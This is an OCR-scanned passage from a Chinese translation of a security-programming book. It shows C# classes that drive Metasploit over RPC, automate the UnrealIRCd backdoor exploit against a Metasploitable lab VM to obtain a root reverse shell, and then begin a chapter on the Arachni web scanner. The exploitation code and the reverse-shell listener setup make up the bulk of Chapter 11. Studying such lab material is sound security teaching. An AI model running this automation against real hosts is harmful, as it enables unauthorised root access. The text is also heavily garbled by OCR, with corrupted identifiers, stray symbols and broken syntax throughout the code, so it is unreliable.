All | Packages | Projects | .Net Assembly Q search (Control+F) Selected references: © 


全 System 
Version=4.0.0.0, Culture=neuytral, Pu... 


Name a |Size Modified 
“ MsgPack.dll 583.7 kB 09:58 


| Google Drive 
Home 
图 SteamGames 
Eicloud 


| Assemblies <: 


MsgPack, Version=0.6.0.0, Culture=neutral, PublicKkeyToken=a2625990d5dc01 67| Add | 


图 11-3 ”编辑 引用 对 话 框 


在 找到 MsgPack.dll 库 文件 之 后 ， 选 中 它 并 点 击 对 话 框 右 下 角 的 OK 按钮 。 这 个 操作 将 MsgPack.dll 库 添加 到 工程 中 ， 因 此 你 
可 以 在 C# 头 文件 中 引用 该 库 并 使 用 其 中 的 类 ，。 


11.4 ” 编 瑟 MetasploitSession 类 


现在 我 们 需要 构建 MetasploitSession 类 ， 来 与 RPC 服 务 器 进行 通信 ， 具 体 代 码 如 清单 11-4 所 示 。 
清单 11-4: MetasploitSession 类 构造 器 ，Token 属 性 ， 以 及 Authenticate () 方法 


public class MetasploitSession : IDisposable 
{ 

string host; 

string token; 


public MetasploitSession(@string username, string password, string host) 
{ 

host = host; 

token = null; 


Dictionary<object, object> response = this.@Authenticate(username, password); 


@bool loggedIn = !response.ContainsKey("error"); 
if (!loggedIn) 
@throw new Exception(response["error message"] as string); 
©@if ((response["result"| as string) == "success" 
token = responsel["token"| as string; 


} 

public string @Token 

, get { return token; } 

} 

public Dictionary<object, object> Authenticate(string username, string password) 
return this.@Execute("auth.login", username, password); 


MetasploitSession 类 的 构造 器 有 三 个 参数 ， 如 Q@ 处 所 示 : 用 户 名 和 口令 ， 以 及 要 连接 的 主机 ; 前 两 者 用 来 对 后 者 进行 身份 
认证 。 我 们 使 用 提供 的 用 户 名 和 口令 来 调用 Authenticate () 万 法 @， 然 后 通过 检查 响应 消息 中 是 否 包 含 错误 @ 来 判断 认证 结 
果 。 如 果 认 证 失败 ， 则 抛 出 异常 @@; 如 果 认证 成 功 ， 我 们 使 用 RPC@ 所 返回 的 认证 令 牌 值 为 token 变 量 赋值 ， 并 将 Token 属 性 
@ 公 开 。Authenticate () 方法 调用 Execute () 方法 @， 将 auth.login 作 为 RPC 万 法 传递 ， 并 高 有 用 己 名 和 口令 两 个 参数 。 


11.4.1 为 HTTP 请 求 以 及 与 MSGPACK 库 进行 交互 创建 Execute () 方法 


清单 11-5 中 的 Execute () 方法 完成 了 RPC 库 的 大 部 分 工作 ， 包 括 创 建 并 上 友 送 HTTP 请 求 ， 以 及 将 RPC 方 法 和 参数 序列 化 传 


入 MSGPACK 库 。 
清单 11-5: MetasploitSession 类 的 Execute () 方法 


public Dictionary<object, object> Execute(string method, params object[|] args) 


{ 
if @(method != "auth.login" && string.IsNullOrEmpty( token)) 
throw new Exception("Not authenticated."); 


HttpWebRequest request = (HttpWebRequest)WebRequest.Create( host); 
request.ContentType = @ binary/message-pack ; 

request.Method = “POST ; 

request.KeepAlive = true; 


using (Stream requestStream = request.GetRequestStream()) 
using (Packer msgpackWriter = @Packer.Create(requestStream)) 


{ 
bool sendToken = (!string.IsNullOrEmpty( token) && method != "auth.login"); 
msgpackWriter.@PackArrayHeader(1 + (sendToken ? 1 : 0) + args.Length); 
msgpackWriter.Pack(method); 


if (sendToken) 
msgpackWriter.Pack( token); 
@foreach (object arg in args) 
msgpackWriter.Pack(arg); 


@using (MemoryStream mstream = new MemoryStream()) 


using (WebResponse response = request.GetResponse()) 
using (Stream rstream = response.GetResponseStream()) 
rstream.CopyTo(mstream); 


mstream.Position = 0; 


MessagePackObjectDictionary resp = 
Unpacking.@UnpackObject(mstream).AsDictionary(); 
return MessagePackToDictionary(resp); 


} 
} 


在 处 检查 传递 给 RPC 方 法 的 是 否 为 auth.login， 该 函数 是 唯一 不 需要 认证 的 RPC 方 法 。 如 果 不 是 auth.login 方 法 且 示 设置 
认证 令 牌 ， 则 抛 出 异常 ; 因为 没有 认证 的 情况 下 ， 传 递 的 命令 将 执行 失败 。 


一 旦 我 们 在 构造 发 送 给 API 函 数 的 HTTP 请 求 乙 前 进行 了 必要 的 身份 认证 ， 那 么 就 可 以 将 ContentType 设 置 为 
binarymessage-pack@， 这 样 API 函 数 就 能 够 获知 ， 发 送 给 它 的 MSGPACK 数 据 采 用 了 HTTP 主 体 结 构 。 然 后 ， 我 们 将 HTTP 请 
求 流传 递 给 Packer.Create () 方法 @,， 创建 一 个 Packer 类 。 通 过 Packer 类 (定义 于 MsgPack.Cli 库 ) 可 以 非常 省 时 地 将 RPC 方 
法 及 其 参数 写 入 HTTP 请 求 流 中 。 我 们 将 使 用 Packer 类 中 的 多 种 方法 来 对 RPC 参 数 及 其 参数 进行 序列 化 ， 并 将 其 写 入 请 求 流 中 。 


我 们 使 用 PackArrayHeader () 方法 @ 来 得 到 待 写 入 请 求 流 的 信息 总 条 数 。 比 如 ，auth.login 方 法 有 三 条 信息 : 方法 名 及 其 
两 个 参数 一 一 用 户 名 和 口令 。 我 们 在 流 中 首先 写 入 数字 3， 然 后 使 用 Pack () 方法 写 入 字符 串 auth.login、 用 户 名 和 口令 。 我 们 
就 使 用 这 个 将 API 方 法 及 其 参数 序列 化 并 以 HTTP 主 体 结构 发 送 的 通用 过 程 ， 来 将 APl 请 求 上 帮 送 到 Metasploit RPC。 


将 RPC 方 法 写 入 请 求 流 忆 后， 我 们 将 写 入 认证 令 牌 (如 果 需 要 的 话 ) 。 然 后 ， 我 们 转 而 在 一 个 foreach 循 环 @ 中 将 RPC 方 法 


的 参数 打包 ， 在 HTTP 请 求 中 构造 API 调 用 的 过 程 到 此 结 


Execute () 方法 的 剩余 部 分 用 于 读 取 MSGPACK 序 列 化 的 HTTP 响 应 信息 ， 并 将 其 转换 为 我 们 能 够 使 用 的 C# 类 。 我 们 首先 
使 用 MemoryStream () 方法 @ 将 响应 信息 读 入 一 个 字 节 数组 。 然 后 ， 通 过 UnpackObject () 方法 @ 将 响应 信息 反 序 列 化 ， 
将 字 忆 数组 作为 唯一 参数 传递 给 该 方法 ， 并 返回 MSGPACK 字 上 典 类 型 的 对 象 ; 尽管 准确 来 讲 ， 这 个 MSGPACK 字 上 典 并 不 是 我 们 想 
要 的 。 字 典 中 所 包含 的 值 (比如 字符 串 ) 都 需要 转换 为 对 应 的 C# 类 副本 ， 这 样 我 们 才能 方便 地 使 用 它们 。 要 完成 这 项 任务 ,我 
们 将 MSGPACK 字 典 传递 给 MessagePackToDictionary () 方法 (下 一 节 将 讨论 ) 。 


11.4.2 ”转换 MSGPACK 库 的 响应 数据 


下 面 几 个 方法 主要 用 于 将 来 自 Metasploit 平 台 的 API 响 应 消息 ， 从 MSGPACK 格 式 转 换 为 便于 使 用 的 C# 类 。 
通过 MessagePackToDictionary () 方法 将 MSGPACK 对 象 转换 为 C# 字 暴 


清单 11-6 所 示 的 MessagePackToDictionary () 方法 ， 在 清单 11-5 的 Execute () 方法 结尾 被 调用 。 它 接受 一 个 
MessagePackObjectDictionary 类 型 的 参数 ， 并 将 其 转换 为 一 个 C# 字 上 典 (用 于 保存 键 / 值 对 的 类 ) ， 后 者 三 Ruby 或 Python 语言 
中 的 hash 类 型 非常 类 似 。 


清单 11-6: MessagePackToDictionary () 方法 


Dictionary<object,object> MessagePackToDictionary(@MessagePackObjectDictionary dict ) 


Dictionary<object, object> newDict = new @Dictionary<object, object>(); 
foreach (var pair in ©@dict) 


{ 
object newKey = @GetObject(pair.Key); 
if (pair.Value.IsTypeOf<MessagePackObjectDictionary>() == true) 
newDict[newKey| = MessagePackToDictionary(pair.Value.AsDictionary()); 
else 
newDict[newKey|] = @GCetObject(pair.Value); 
} 


@return newDict; 


’ 


MessagePackToDictionary () 方法 只 有 一 个 参数 @， 即 我 们 想 要 转换 为 C# 字 典 的 MSGPACK 字 上 典 @。 一 旦 我 们 创建 了 C# 
字典 ， 我 们 将 通过 和 迭代 处 理 作为 参数 传递 给 方法 的 MSGPACK 字 典 @ 中 每 一 个 键 / 值 对 ， 来 将 转换 后 的 MSGPACK 对 象 放 入 其 
中 。 首 先 ， 获 取 一 个 C# 对 象 作为 当前 循环 迭代 的 给 定 键 @; 然后 ， 检 查 对 应 键 值 来 确定 如 何 妥 善 处理 它 。 比 如 ， 如 果 键 值 是 一 
个 字典 ， 那 么 我 们 将 递归 调用 MessagePackToDictionary () 方法 来 处 理 ; 否则 ， 通 过 GetObject () 方法 @ (随后 定义 ) 来 
将 其 转换 为 对 应 的 C# 类 型 。 最 后 ,我 们 将 C# 类 型 (而 不 是 MSGPACK 类 型 ) 的 新 字典 @ 返 回 。 


通过 GetObject () 方法 将 MSGPACK 对 象 转换 为 C# 对 象 


清单 11-7 展 示 了 如 何 实现 清单 11-6 处 所 示 的 GetObject () 方法 。 该 方法 接受 一 个 MessagePackObject 类 型 的 参数 ， 将 其 
转换 为 对 应 的 C# 类 ， 并 返回 新 对 象 。 


清单 11-7: MetasploitSession 类 的 GetObject () 方法 


private object GetObject(MessagePackObject str) 


{ 
@if (str.UnderlyingType == typeof(bytel |)) 
return System.Text.Encoding.ASCIIT.GetString(str.AsBinary()); 
else if (str.UnderlyingType == typeof(string)) 
return str.AsString(); 
else if (str.UnderlyingType == typeof(byte)) 
return str.AsByte(); 
else if (str.UnderlyingType == typeof(bool) ) 
return str.AsBoolean( ) ; 


@return null; 


} 


GetObject () 方法 检查 一 个 对 象 是 否 为 某 种 类 型 ， 比 如 字符 捉 或 布尔 类 型 ， 如 果 它 发 现 匹 配 的 类 型 就 返回 C# 类 型 的 对 
象 。 在 @ 处 ,我 们 通过 一 个 UnderlyingType 属 性 (该 属性 是 一 个 字符 串 的 字 节 数组 ) 来 转换 MessagePackObject 类 型 ， 并 返回 
一 个 新 字符 串 。 因 为 Metasploit 平 台所 友 送 的 某 些 “字符 串 ” 实 际 上 只 是 字 节 数组 ， 所 以 我 们 必须 在 程序 开头 将 这 些 字数 组 
转换 为 字符 串 ， 或 者 在 用 到 它们 时 将 其 强制 转换 为 字符 串 。 一 般 来 讲 ， 强 制 转 损 计算 效率 不 高 ， 因 此 最 好 预先 将 所 有 的 值 转换 完 


毕 。 


ff 语句 的 剩余 部 分 检查 并 转换 其 他 的 数据 类 型 。 如 果 执 行 到 最 后 的 else if 语 句 却 没有 返回 一 个 新 对 象 ， 则 返回 null 值 @@。 我 
们 可 以 通过 返回 结果 来 判断 转换 为 男 一 种 类 型 的 过 程 是 否 成 功 。 如 果 返 回 null 值 ， 则 必须 找 出 不 能 将 MSGPACK 对 象 转换 为 C# 类 
的 原因 


使 用 Dispose () 方法 清理 RPC 会 话 
清单 11-8 所 示 的 Dispose () 方法 负责 在 垃圾 回收 阶段 清理 RPC 会 话 。 
清单 11-8: MetasploitSession 类 的 Dispose () 方法 

public void Dispose( ) 


if (this.@Token != null) 


this.Execute("auth.logout", this.Token); 
token = null; 


} 
} 


如 果 Token 属 性 不 为 空 ， 则 认为 处 于 认证 登录 状态 ， 那 么 我 们 就 将 认证 令 牌 作为 唯一 参数 传递 来 调用 auth.logout 方 法 ， 并 
将 token 本 地 变量 赋值 为 null。 


11.5 ”测试 会 话 类 
现在 ， 我 们 通过 显示 RPC 的 版 本 号 来 测 斌 会话 类 ( 详 见 清单 11-9) 。 在 确定 会 话 类 正常 工作 并 正常 结束 之 后 ， 我 们 将 正式 


开始 驱动 Metasploit 平 人 台 并 转向 目 动 化 对 Metasploitable 系 统 进行 漏洞 利用 工作 。 


清单 11-9: 通过 从 RPC 接 口 获取 版 本 信息 来 测试 MetasploitSession 类 


public static void Main(string[] args ) 


string listenAddr = @args[oj]; 
using (MetasploitSession session = new @MetasploitSession("username", 
"password", "http://"+listenAddr+":55553/api")) 


{ 
if (string.IsNullOrEmpty(session.Token)) 


throw new Exception("Login failed. Check credentials"); 


Dictionary<object, object> version = session.®@Execute("core.version"); 


Console.WriteLine(@"Version: ”+ version|["version" |); 
Console.WritelLine(©@"Ruby: ”+ version["ruby"]); 
Console.WritelLine(@"API: ”+ version["api"|]); 


个 测试 小 程序 只 需要 一 个 参数 : Metasploit 主 机 IP 地 址 。 0 
值 ， 该 变量 用 于 创建 一 个 新 的 MetasploitSession 类 变量 @。 一 旦 认证 通过 ， 惑 可 调用 RPC 方 法 core.version@ 来 显示 所 用 的 
Metasploit 平 台 @，Ruby 语 言 © 和 API 孙 数 库 @ 的 版 本 信息 ， 具 体 输 出 内 容 如 清单 11-10 所 示 。 


清单 11-10: 运行 MetasploitS9ession 类 测试 程序 ， 打 印 API 印 数 库 ，Ruby 语 言 和 Metasploit 平 台 的 版 本 信息 


$ ./ch11 automating metasploit.exe 192.168.0.2 
Version: 4.11.8-dev-a030179 

Ruby: 2.1.6 x86 64-darwin14.0 2015-04-13 

API: 1.0 


11.6 编写 MetasploitManager 类 


清单 11- ee 包括 列举 会 话 ， 读 取 会 话 命 令 行 和 执行 模块 的 能 力 ， 我 们 
需要 使 用 这 些 功能 来 通过 RPC 编 程 实现 驱动 漏洞 利用 过 程 的 目的 。 


清单 11-11: MetasploitManager 类 


public class MetasploitManager : IDisposable 
{ 


private MetasploitSession session; 


public MetasploitManager(@MetasploitSession session) 


_session = session; 


} 

public Dictionary<object, object> @ListjJobs() 

| return session.Execute("job.1ist"); 

} 

public Dictionary<object, object> StopJob(string jobID) 
return session.Execute("job.stop", jobID); 


public Dictionary<object, object> @ExecuteModule(string moduleType, string moduleName, 
Dictionary<object, object> options) 


{ 
return session.Execute("module.execute", moduleType, moduleName, options); 
} 
public Dictionary<object, object> ListSessions() 
{ 
return session.Execute("session.1ist"); 
} 
public Dictionary<object, object> StopSession(string sessionID) 
{ 
return session.Execute("session.stop", sessionID); 
} 


public Dictionary<object, object> @ReadSessionShell(string sessionID, int? readPointer = null) 
{ 
if (readPointer.HasValue) 
return session.Execute("session.shell read", sessionID, readPointer.Value); 
else 
return session.Execute("session.shell read", sessionID); 


} 

public Dictionary<object, object> @WriteToSessionShell(string sessionID, string data) 
| return session.Execute("session.shell write", sessionID, data); 

} 

public void Dispose() 

, _session = null; 

} 


} 


MetasploitManager 类 的 构造 器 取 一 个 MetasploitSession 类 变量 @ 作 为 它 唯一 的 参数 ， 然 后 用 这 个 会 话 参 数 为 一 个 类 本 地 
变量 赋值 。 类 中 其 余 的 方法 都 是 对 一 个 特定 的 RPC 方 法 进行 封 法， 我们 将 用 这 些 方法 对 Metasploitable 2 系统 进行 自动 化 漏洞 利 
用 。 比 如 ， 可 以 使 用 ListJobs () 方法 @ 来 监控 漏洞 利用 过 程 ， 从 而 获知 漏洞 利用 过 程 已 结束 ， 并 在 获取 命令 行 的 主机 上 执行 命 


俱 、 
Xo 


我 们 使 用 ReadSessionShell () 方法 @ 来 读 取 在 会 话 中 执行 命令 所 返回 的 任何 输出 结果 ; 相反 ,，WriteToSessionShell () 
方法 @ 癌 命令 行 写 入 任何 待 执行 的 命令 。EXecuteModule () 方法 @ 选 择 一 个 模块 来 执行 ， 并 在 模块 执行 时 使 用 选项 。 每 一 种 


方法 使 用 Execute () 来 执行 一 个 给 定 的 RPC 方 法 ， 并 向 调用 者 返回 结果 。 下 一 节 完 成 驱动 Metasploit 平 台 的 最 后 工作 时 ， 我 们 
将 讨论 每 一 种 方法 。 


11.7 


等 
人 二 


整合 代码 模块 


现在 ， 可 以 使 用 我 们 的 类 通过 Metasploit 平 台 开 始 自 动 化 的 漏洞 利用 工作 。 首 先 ， 编写 一 个 Main () 方法 来 监听 反 向 连接 
的 命令 行 ; 然后 运行 一 个 漏洞 利用 示例 ， 来 让 Metasploitable 系 统 通过 一 个 新 会 话 回 连 到 监听 器 ( 详 见 清单 11-12) 。 


清单 11-12: Main () 方法 的 起 始 部 分 代码 ， 用 于 自动 化 运行 MetasploitSession 和 MetasploitManager 类 


public static void Main(string[] args ) 


@string listenAddr = args[1]; 
int listenPort = 4444; 
string payload = “cmd/unix/reverse'; 


using (@MetasploitSession session = new MetasploitSession("username", 
"password", "http://"+listenAddr+":55553/api")) 


L 


if (string.IsNullOrEmpty(session.®@Token)) 
throw new Exception("Login failed. Check credentials"); 


using (MetasploitManager manager = new @MetasploitManager(session)) 


Dictionary<object, object> response = null; 


@Dictionary<object, object> opts = new Dictionary<object, object>(); 
opts["ExitOnSession"| = false; 
opts["PAYLOAD" | = payload; 


opts 


[ 
["LHOST"| = listenAddr; 
[ 1 


opts["LPORT"] = 1ListenPort ; 


response = manager.@ExecuteModule("exploit", "multi/handler", opts); 
object jobID = response[ "job id"|]; 


接 下 来 ， 我 们 定义 一 些 之 后 将 用 到 的 变量 @: Metasploit 平 台 为 反 向 连接 而 监听 的 地 址 和 端口 ， 以 及 发 送 到 
Metasploitable 系 统 的 载荷 。 然 后 ， 我 们 创建 一 个 新 的 MetasploitSsession 类 变 @ 量 ， 并 检查 会 话 的 Token 属 性 @ 来 确保 认证 成 
功 。 一 旦 成 功 通过 身份 认证 ， 我 们 将 会 话 传递 给 一 个 新 的 MetasploitManager 类 变量 @)， 开 始 漏 洞 利用 过 程 。 


在 昌 处 创建 一 个 字典 变量 ， 用 来 保存 当 我 们 开始 监听 反 向 连接 时 友 送 给 Metasploit 平 台 的 选项 ， 即 ExitOnSession.、 
PAYLOAD、LHOST 和 LPORT。ExitOnSession 选 项 是 一 个 布尔 值 ， 它 指示 会 话 连 接 时 监听 器 是 否 停 止 监听 : 车 该 值 为 真 ， 监 听 
器 将 停止 监听 ; 否则 监听 器 将 继续 监听 等 待 新 的 命令 行 。PAYLOAD 选 项 是 一 个 字符 串 ， 它 通知 Metasploit 平 台 监听 器 所 等 待 的 
是 哪 种 反 向 连接 载 茶 。LPORT 和 LHOST 分 别 是 监听 的 端口 和 IP 地 址 。 使 用 ExecuteModule () 方法 @ 将 这 些 选项 传递 
给 “multyhandler” 漏 洞 利用 模块 〈 该 模块 监听 等 待 来 自 Metasploitable 系 统 的 反 向 连接 命令 行 ) ， 这 将 开始 一 个 作业 来 监听 


待 反 向 连接 


全 人 人 二 
命令 行 。 


ExecuteModule () 方法 返回 作业 ID， 我 们 将 该 ID 存储 下 来 以 备 后 用 。 


11.7.1 ”运行 漏 同 利用 示例 


清单 11-13 展 示 了 如 何 添 加 代码 来 对 Metasploitable 系 统 进 行 真正 的 漏洞 利用 工作 。 
清单 11-13: 通过 RPC 运 行 虚拟 的 IRCD 漏 洞 利用 


opts = new Dictionary<object, object>(); 
opts["RHOST"] = args[0j]; 
opts["DisablePayloadHandler"|] = true; 
opts["LHOST"] = listenAddr; 
opts["LPORT"] = listenport; 
opts["PAYLOAD"] = payload; 


manager.@ExecuteModule("exploit", "unix/irc/unreal ircd 3281 backdoor", opts); 


正如 之 前 的 做 法 ， 在 调用 ExecuteModule () 万 法 @ 和 向 其 传递 漏 洱 利 用 模块 名 
称 “unix/irc/unreal_ircd_3281_backdoor” 及 选项 之 前 ， 需 在 一 个 字典 中 建立 模块 数据 存储 选项 〈 详 见 清单 11-14) 。 


清单 11-14: 监视 虚拟 IRC 漏 洞 利用 过 程 执行 完毕 的 过 程 


response = manager.@List]Jjobs() ; 
while (response.@ContainsValue("Exploit: unix/irc/unreal ircd 3281 backdoor")) 


| 


Console.WritelLine("Waiting"); 


System.Threading.Thread.Sleep(10000); 
response = manager.®@ListJobs(); 


} 


response = manager.@StopJob(jobID.ToString()); 


ListJobs () 万 法 @ 以 模块 名 称 字 符 串 列表 的 形式 ， 返 回 当前 运行 于 Metasploit 实 例 的 所 有 作业 列表 。 如 果 列 表 中 包 合 我 们 
所 运行 的 模块 名 称 ， 则 说 明 我 们 的 漏洞 利用 过 程 还 未 结束 ， 因 此 需要 稍 等 片刻 并 重复 检查 ， 直 到 我 们 的 模块 不 再 列 出 。 如 果 
ContainsValue () 万 法 @ 返 回 真 值 ， 则 说 明 我 们 的 模块 仍 在 执行 ， 因 此 我 们 选择 休眠 并 再 次 调用 ListJobs () 万 法 @@， 直 到 漏 
洞 利用 模块 不 再 出 现在 作业 列表 中 ， 这 意味 背 它 已 经 执行 完毕 ; 现在 我 们 获得 了 一 个 命令 行 。 最 后 ， 通 过 向 StopJob () 方法 @ 
传递 之 前 所 存储 的 作业 ID， 来 关闭 “multVhandler” 漏 洞 利用 模块 。 


11.7.2 与 命令 行进 行 交 互 


现在 ， 我 们 能 够 与 新 命令 行进 行 交 互 。 为 了 测试 连通 性 ， 我 们 通过 运行 一 个 简单 的 命令 来 验证 我 们 确实 能 够 访问 想 要 的 资 
具体 代码 如 清单 11-15 所 示 。 
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清单 11-15: 检索 当前 会 话 的 列表 并 打印 结果 


response = manager.@ListSessions(); 
foreach (var pair in response) 


{ 
string sessionID = pair.Key.ToString(); 
manager. @WriteToSessionShell(sessionID, "id\n"); 
System.Threading.Thread.Sleep(1000); 
response = manager.®@ReadSessionShell(sessionID); 
Console.WritelLine("We are user: ”+ response ["data"|); 
Console.WriteLine("Killing session: ”+ sessionID); 
manager.@StopSession(sessionID); 


在 @ 处 调用 ListSessions () 方法 ， 将 得 到 的 会 话 ID 和 会 话 相 关 通 用 信息 (比如 会 话 类 型 ) 组 成 的 一 个 列表 。 接 下 来 对 每 个 
会 话 (应 该 只 有 一 个 ， 除 非 多 次 执行 渗透 测试 用 例 ! ) 进行 循环 操作 : 使 用 WriteToSessionShell () 方法 @ 同 会 话 命 令 行 写 
入 “id” 命 令 ， 然后 休眠 一 段 时 | 间 ， 之 后 使 用 ReadSessionShell () 方法 @ 读 取 响应 信息 ; 最 后 ， 获 取 打 印 在 被 攻击 系统 上 执 
行 “id” 命 令 的 结果 ， 之 后 通过 StopSession () 方法 @ 关 闭会 话 。 


11.7.3 ”连接 得 到 命令 行 


现在 ， 我 们 可 以 运行 自动 化 程序 并 得 到 一 些 简单 的 命令 行 。 程 序 运 行 需要 两 个 参数 : 渗透 测试 的 目标 主机 ， 以 及 
Metasploit 平 台 监听 等 待命 令 行 的 I|P 地 址 ， 具 体 如 清单 11-16 所 示 。 


清单 11-16: 运行 虚拟 IRC 目 动 化 漏洞 利用 程序 ， 结 果 显 示 我 们 得 到 一 个 root 权 限 的 命令 行 


$ ./ch11 automating metasploit.exe 192.168.0.18 192.168.0.2 
Waiting 

Waiting 

Waiting 

Waiting 

Waiting 

We are user: @uid=0(root) gid=0(root) 


Killing session: 3 


$ 


如 果 一 切 运行 正常 ， 我 们 将 得 到 一 个 root 权 限 的 命令 行 @， 随 后 可 以 使 用 C# 上 自动 化 程序 在 Metasploitable 系 统 上 运行 一 些 
后 续 渗透 攻击 模块 ， 或 者 可 能 只 是 多 准备 一 些 备用 命令 行 ， 以 防 这 个 命令 行 失效 。 模 
块 “post/linux/gather/enum_configs” 是 Linux 系 统 上 常用 的 后 续 渗透 攻击 模块 ， 在 得 到 Metasploitable 系 统 上 最 初 的 命令 行 
之 后 ， 你 可 以 重新 编写 上 自动 化 程序 来 运行 该 模块 ， 或 者 任意 形 如 “post/linux/gather/enum_*” 的 模块 。 


通过 驱动 Metasploit 框 架 能 出 色 地 完成 很 多 任务 ， 从 探测 发 现 到 漏洞 利用 ， 这 只 是 开始 罢了 。 如 上 文 所 述 ，Metasploit 平 
台 甚 至 有 很 多 针对 多 个 操作 系统 的 模块 用 于 后 续 的 渗透 攻击 。 你 还 可 以 使 用 “auxiliaryscanner*” 目录 下 的 辅助 扫 摘 器 来 驱动 
扫描 探测 工作 。 一 个 不 错 的 练习 是 使 用 第 4 章 所 编写 的 跨 平 台 Metasploit 载 荷 ， 通 过 RPC 动 态 生 成 shellcode 代 码 并 构造 动态 的 载 
何 。 


11.8 本草 小 结 


本 章 介 绍 如 何 构 造 一 个 小 型 的 类 集合 ， 通 过 RPC 接 口 来 编程 驱动 Metasploit 平 台 的 工作 。 使 用 基本 的 HTTP 库 和 第 三 方 
MSGPACK 库 ， 我 们 可 以 利用 虚拟 IRCD 后 门 来 对 Metasploitable 系 统 虚拟 机 进行 漏洞 利用 ， 之 后 通过 在 被 攻击 主机 上 运行 命令 
来 证 实 我 们 得 到 了 root 权 限 的 命令 行 。 


在 本 章 中 我 们 只 了 解 了 Metasploit 平 台 RPC 的 功能 。 我 强烈 建议 深入 研究 一 下 ， 在 企业 应 用 的 情景 中 如 何 将 Metasploit 平 
台 与 变更 管理 流程 或 软件 开发 生命 周期 的 过 程 相 融 合 ， 从 而 通过 目 动 扫 摘 来 避免 错 误 的 配置 或 在 数据 中 心 或 网 络 中 再 次 此 入 有 漏 
洞 的 软件 ;在 家 用 情景 中 ， 你 可 以 通过 Metasploit 平 台 自 带 的 Nmap 集 成 工具 来 轻松 地 完成 新 设备 的 自动 检测 工作 ， 从 而 找到 孩 
子 私 藏 的 任何 新 手机 或 小 器 件 。 当 它 与 Metasploit 框 染 的 灵活 性 和 功能 相 结 合 时 ， 我 们 丈 拥 有 了 无 限 可 能 。 


第 12 章 ” 目 动 化 运行 Arachni 


Arachni 软 件 是 使 用 Ruby 语 言 编写 的 一 款 强 大 的 Web 应 用 程序 黑 盒 安全 扫描 器 。 它 的 特点 是 : 支持 多 种 类 型 的 Web 应 用 程 
序 漏洞 ， 包 括 开放 式 Web 应 用 程序 安全 项 目 (OWASP) 中 排名 前 十 的 多 个 漏洞 (比如 XSS 和 SQL 注 入 ) ; 可 扩展 的 分 布 式 架构 
能 够 使 扫描 器 在 集群 中 动态 加 速 运行 ， 以 及 通过 远程 过 程 调用 (RPC) 接口 和 表述 性 状态 转移 (REST) 接口 实现 完全 自动 运 
行 。 在 本 章 中 ， 你 将 学 习 如 何 使 用 REST API 函 数 以 及 RPC 接 口 驱 动 Arachni 软 件 ， 来 针对 给 定 的 URL 地 址 扫描 Web 应 用 程序 漏 
洞 。 


12.1 ” 安 委 Arachni 软 件 


Arachni 网 站 (http://www.arachni.scanner.com/) 提供 了 针对 多 种 操作 系统 的 Arachni 最 新 下 载 软件 包 ， 你 可 以 使 用 这 
些 安装 程 序 在 你 的 系统 上 安装 Arachni 软 件 。 下 载 之 后 ， 你 可 以 通过 运行 Arachni 软 件 扫描 一 个 专门 设计 用 于 Web 漏 洞 测试 的 服 
务 器 来 进行 测试 ， 如 清单 12-1 所 示 。 尽 管 这 条 命令 还 没有 用 到 RPC 来 驱动 Arachni 软 件 运行 ， 但 你 可 以 看 到 在 扫描 潜在 的 XSS 或 
SQL 注入 漏洞 时 ， 我 们 将 得 到 哪 种 类 型 的 输出 。 


清单 12-1: 运行 Arachni 软 件 扫 摘 一 个 专门 设 有 漏洞 的 网 站 


$ arachni --checks xss*,sql* --scope-auto-redundant 2 \ 
"http://demo.testfire.net/default.aspx" 


该 命令 使 用 Arachni 软 件 检查 网 站 “http://demo.testfire.net/default.aspx” 是 否 存在 XSS 和 和 SQL 相关 的 漏洞 。 我 们 通过 
将 “--scope-auto-redundant” 选 项 设置 为 2， 来 限制 检查 网 页 的 沁 围 ; 这 样 做 会 使 Arachni 软 件 以 同样 的 参数 前 往 URL 地 址 ， 
而 在 转向 新 的 URL 地 址 之 前 使 用 人 至 多 两 倍 的 不 同 参 数 。 在 存在 使 用 相同 参数 的 大 量 链 接 ， 而 这 些 链接 又 都 指向 同一 页 面 的 情况 
下 ，Arachni 软 件 能 够 更 快速 地 进行 扫 摘 。 


注意 : 关于 Arachni 软 件 所 支持 的 漏洞 检查 的 完整 介绍 和 文档 ， 请 访问 Atachni 软 件 相关 的 GitHub 页 


面 : https:/ /www.github.comy/Arachni/arachni/wiki/Command-line-uset-intetface#checks/， 该 页 面 详 细 介 绍 了 命令 行 参 数 的 相关 情 
况 。 

只 需要 几 分 钟 (这 取决 于 你 的 网 速 ) ，Arachni 软 件 将 反馈 网 站 中 存在 的 一 些 XSS 和 和 SQL 注入 漏洞 。 别 担心 ， 一 定 会 有 结 
的 ! 这 个 网 站 的 设计 本 来 残存 在 漏洞 。 在 本 章 的 后 续 部 分 中 ， 你 将 在 测试 编写 的 C# 自 动 执行 程序 时 ， 用 到 这 个 包括 XSS9、SQL 注 
入 以 及 其 他 漏洞 的 列表 ， 从 而 确保 你 的 自动 执行 程序 返回 正确 的 结 

但 我 们 要 讨论 的 场景 是 ， 你 想 要 在 安全 软件 开 友 生命 周期 (SDLC) 的 某 一 环节 中 ， 针 对 Web 应 用 程序 的 任意 构建 结构 来 自 
动 运 行 Arachni 软 件 进行 测试 。 手 动 运行 Arachni 软 件 并 不 是 很 有 效率 ， 但 我 们 可 以 很 轻松 地 自动 运行 Arachni 软 件 来 开始 进行 扫 
描 工作 ， 从 而 使 其 能 够 与 任何 持续 集成 系统 协同 工作 ， 进 而 依据 扫描 结果 来 通过 /否决 构建 结构 。 这 束 是 REST API 函 数 能 够 处 理 


的 问题 。 


12.2 Arachni 软 件 的 REST API 辑 数 


目前 ，Arachni 软 件 已 经 引入 了 一 个 REST API 函 数 机 制 ， 从 而 使 得 用 户 可 以 使 用 简单 的 HTTP 请 求 来 驱动 Arachni 软 件 。 清 
12-2 展 示 了 如 何 启动 该 API| 浮 数 。 


清单 12-2: 运行 Arachni 软 件 的 REST 服 务 器 


$ arachni rest server 
Arachni - Web Application Security Scanner Framework v2.0dev 
Author: Tasos “Zapotek ”Laskos <tasos.laskos@arachni-scanner.com> 


(With the support of the community and the Arachni Team.) 


Website: http://arachni-scanner .com 


Documentation: http://arachni-scanner.com/wiki 


@[*] Listening on http://127.0.0.1:7331 


启动 服务 器 时 Arachni 软 件 将 输出 一 些 自身 相关 的 信息 ， 包 括 IP 地 址 和 监听 端口 @。 确 保 服 务 器 正在 工作 之 后 ， 就 可 以 开始 
使 用 API 函 效 了 。 


通过 REST API 消 数 ， 你 可 以 使 用 任何 通用 的 HTTP 工 具 (比如 curl 工 具 甚至 是 netcat 工 具 ) 来 进行 一 次 简单 扫描 。 在 本 书 
中 ， 我 们 将 像 之 前 章节 一 样 使 用 curl 工 具 ; 首次 扫描 如 清单 12-3 所 示 。 


